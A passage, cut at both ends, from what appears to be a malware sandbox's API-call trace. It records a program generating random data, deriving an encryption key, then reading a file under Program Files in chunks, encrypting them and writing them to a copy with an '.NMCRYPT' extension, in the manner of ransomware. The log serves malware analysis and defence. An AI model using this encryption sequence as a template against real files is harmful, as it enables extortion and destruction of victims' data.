hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.443] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.443] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.443] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.443] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.443] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.443] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.443] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.443] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.443] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.443] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.443] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.443] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.443] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.443] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.443] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.443] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.443] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.443] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.443] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.443] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.443] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.443] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.443] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.443] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.443] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.443] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.443] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.443] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.443] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.443] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.443] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.443] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.443] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.443] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.443] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.443] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.443] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.443] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.443] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.444] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.444] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.444] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.444] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.444] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.444] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.444] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.444] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.444] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.444] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.444] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.444] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.444] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.444] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.444] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.444] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.444] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.444] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.444] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.444] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.444] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.444] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.444] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.444] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.444] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.444] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.444] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.444] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.444] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.444] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.444] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.444] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.444] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.444] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.444] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.444] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.444] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.444] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.444] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.444] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.444] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.444] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.444] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.444] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.444] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.444] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.444] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.444] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.444] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.444] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.444] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.445] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.445] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.445] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.445] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.445] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.445] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.445] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.445] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.445] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.445] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.445] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.445] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.445] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.445] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.445] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.445] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.445] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.445] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.445] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.445] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.445] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.445] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.445] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.445] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.445] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.445] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.445] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.445] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.445] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.445] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.445] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.445] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.445] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.445] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.445] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.445] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.445] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.445] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.445] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.445] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.445] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.445] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.445] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.445] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.445] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.445] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.445] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.445] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.445] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.446] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.446] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.446] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.446] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.446] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.446] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.446] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.446] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.446] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.446] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.446] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.446] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.446] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.446] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.446] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.446] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.446] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.446] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.446] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.446] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.446] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.446] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.446] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.446] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.446] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.446] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.446] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.446] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.446] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.446] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.446] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0147.446] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0147.447] CryptCreateHash (in: hProv=0x8e3330, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4447ac | out: phHash=0x1d4447ac) returned 1 [0147.447] CryptHashData (hHash=0x9ad138, pbData=0x2d7e6d0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0147.447] CryptDeriveKey (in: hProv=0x8e3330, Algid=0x6610, hBaseData=0x9ad138, dwFlags=0x4, phKey=0x1d4447b0 | out: phKey=0x1d4447b0*=0x9ad2f8) returned 1 [0147.447] CryptSetKeyParam (hKey=0x9ad2f8, dwParam=0x1, pbData=0x2d7e7d0, dwFlags=0x0) returned 1 [0147.447] CryptSetKeyParam (hKey=0x9ad2f8, dwParam=0x4, pbData=0x2d7e680*=0x1, dwFlags=0x0) returned 1 [0147.447] wcslen (_String="\\\\?\\") returned 0x4 [0147.447] CryptDuplicateKey (in: hKey=0x9ad2f8, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e654 | out: phKey=0x2d7e654*=0x9ad338) returned 1 [0147.447] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsfra.xml.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsfra.xml.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x588 [0147.500] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsfra.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsfra.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1624 [0147.501] GetFileSizeEx (in: hFile=0x1624, lpFileSize=0x2d7e644 | out: lpFileSize=0x2d7e644*=2628) returned 1 [0147.501] WriteFile (in: hFile=0x588, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e63c*=0x200, lpOverlapped=0x0) returned 1 [0147.502] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.513] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.513] GetLastError () returned 0x0 [0147.513] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.514] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.514] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.514] GetLastError () returned 0x0 [0147.514] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, 